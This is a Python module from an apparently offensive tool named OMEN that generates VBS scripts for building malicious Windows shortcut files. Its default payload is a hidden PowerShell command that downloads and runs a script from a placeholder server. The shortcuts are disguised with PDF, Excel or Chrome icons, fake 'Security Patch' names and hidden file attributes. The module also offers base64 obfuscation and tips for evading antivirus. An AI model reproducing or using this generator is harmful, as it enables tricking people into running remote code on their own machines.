# OMEN - LNK Shortcut Generator
# Generates malicious .lnk files with icon masquerading

from . import Generator
import base64
import struct


class LnkGenerator(Generator):
    @property
    def name(self):
        return 'LNK Shortcut'

    @property
    def description(self):
        return 'Generates malicious Windows .lnk shortcut files with icon masquerading and command execution'

    def get_options_schema(self):
        return {
            'payload_args': {
                'type': 'text', 'label': 'Command / Arguments',
                'default': 'powershell -NoP -W Hidden -C "iex(New-Object Net.WebClient).DownloadString(\'http://YOUR_SERVER/payload.ps1\')"',
                'description': 'Command to execute when shortcut is opened',
            },
            'icon_target': {
                'type': 'select', 'label': 'Masquerade Icon As',
                'options': ['folder', 'pdf', 'document', 'excel', 'chrome', 'none'],
                'default': 'folder',
                'description': 'Icon to display for the shortcut',
            },
            'hotkey': {
                'type': 'select', 'label': 'Hotkey Trigger',
                'options': ['none', 'CTRL+SHIFT+O', 'CTRL+ALT+U', 'CTRL+SHIFT+P'],
                'default': 'none',
            },
            'window_style': {
                'type': 'select', 'label': 'Window Style',
                'options': ['normal', 'minimized', 'maximized', 'hidden'],
                'default': 'minimized',
            },
            'use_relative_path': {
                'type': 'checkbox', 'label': 'Use Relative Path', 'default': False,
            },
        }

    def generate(self, options, obfuscation='none'):
        args = options.get('payload_args', '')
        icon = options.get('icon_target', 'folder')
        hotkey = options.get('hotkey', 'none')
        window_style = options.get('window_style', 'minimized')
        use_relative = options.get('use_relative_path', False)

        icon_targets = {
            'folder': '%SystemRoot%\\System32\\shell32.dll,3',
            'pdf': '%ProgramFiles%\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe,0',
            'document': '%SystemRoot%\\System32\\shell32.dll,51',
            'excel': '%ProgramFiles%\\Microsoft Office\\root\\Office16\\EXCEL.EXE,0',
            'chrome': '%ProgramFiles%\\Google\\Chrome\\Application\\chrome.exe,0',
            'none': '',
        }

        # Build LNK shell item ID list (PIDL) for icon
        lnk_path = '%SystemRoot%\\System32\\cmd.exe'
        if icon == 'folder':
            lnk_path = '%SystemRoot%\\explorer.exe'

        # Generate the vbs-based LNK creator script (cross-platform LNK construction is complex)
        # We'll generate a VBS script that creates the LNK with proper properties
        vbs_code = self._gen_lnk_script(args, lnk_path, icon, hotkey, window_style)

        if obfuscation != 'none':
            vbs_code = self._obfuscate_vbs(vbs_code)

        return {
            'filename': 'create_shortcut.vbs',
            'content': vbs_code,
            'preview': vbs_code[:2000] + ('\n... [truncated]' if len(vbs_code) > 2000 else ''),
            'mime': 'text/plain',
            'warnings': [
                'Run the generated .vbs on target to create the .lnk file',
                'Some AVs flag VBS scripts that create LNKs',
                'Consider embedding in a .wsf file for better evasion',
            ],
            'analysis': {
                'icon_masquerade': icon,
                'hotkey': hotkey,
                'window_style': window_style,
                'line_count': len(vbs_code.split('\n')),
            }
        }

    def _gen_lnk_script(self, args, lnk_path, icon, hotkey, window_style):
        script = """' LNK Shortcut Creator - Generated by OMEN
' Run this script on the target to create a malicious .lnk shortcut
Option Explicit

Dim shell, link, desktopPath
Set shell = CreateObject("WScript.Shell")
desktopPath = shell.SpecialFolders("Desktop")
Set link = shell.CreateShortcut(desktopPath & "\\" & GetLinkName() & ".lnk")

' Target path (cmd.exe / PowerShell / etc.)
link.TargetPath = """ + lnk_path + """

' Arguments / Payload
link.Arguments = ""/c """ & GetCommand() & """"

' Working directory
link.WorkingDirectory = "%TEMP%"

' Description
link.Description = "System Update Utility"

"""
        # Window style
        ws_map = {'normal': '1', 'minimized': '7', 'maximized': '3', 'hidden': '0'}
        ws_val = ws_map.get(window_style, '7')
        script += f"link.WindowStyle = {ws_val}\n"

        # Hotkey
        if hotkey and hotkey != 'none':
            script += f'link.Hotkey = "{hotkey}"\n'

        # Icon
        if icon and icon != 'none':
            script += f'link.IconLocation = "{self._get_icon_path(icon)}"\n'

        script += """
link.Save()

' Optional: Make it look more convincing
shell.Run "attrib +h +s """ & desktopPath & "\\" & GetLinkName() & """.lnk", 0, False

Function GetCommand()
    ' Load command from external source or embed here
    GetCommand = """ + self._escape_vbs(args) + """
End Function

Function GetLinkName()
    ' Generate a convincing name
    Dim names
    names = Array("System Update", "Security Patch KB5056424", "Office Configuration", "Network Setup", "VPN Connection")
    Randomize
    GetLinkName = names(Int(Rnd * 5))
End Function
"""
        return script

    def _get_icon_path(self, icon):
        paths = {
            'folder': '%SystemRoot%\\System32\\shell32.dll,3',
            'pdf': '%SystemRoot%\\System32\\imageres.dll,-101',
            'document': '%SystemRoot%\\System32\\shell32.dll,51',
            'excel': '%SystemRoot%\\System32\\imageres.dll,-94',
            'chrome': '%SystemRoot%\\System32\\imageres.dll,-21',
        }
        return paths.get(icon, '%SystemRoot%\\System32\\shell32.dll,3')

    def _escape_vbs(self, s):
        return s.replace('"', '""')

    def _obfuscate_vbs(self, vbs):
        encoded = base64.b64encode(vbs.encode('utf-16-le')).decode()
        return f"""' Obfuscated LNK Creator - Generated by OMEN
Execute(StrConv(CreateObject("MSXML2.DOMDocument").createElement("a").Text, vbUnicode))

Function StrConv(d, c)
    With CreateObject("MSXML2.DOMDocument").createElement("b")
        .DataType = "bin.base64"
        .Text = d
        Set c = .NodeTypedValue
    End With
End Function

Function RunPayload()
    Dim enc : enc = "{encoded}"
    Dim dec : dec = StrConv(enc, 0)
    ExecuteGlobal dec
End Function

Call RunPayload()
"""
